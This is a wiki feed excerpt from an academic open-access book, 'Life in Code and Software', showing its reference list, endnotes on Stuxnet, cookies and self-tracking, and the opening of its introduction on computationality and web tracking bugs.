&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4993</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4993"/>
		<updated>2012-06-21T11:05:42Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media, if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
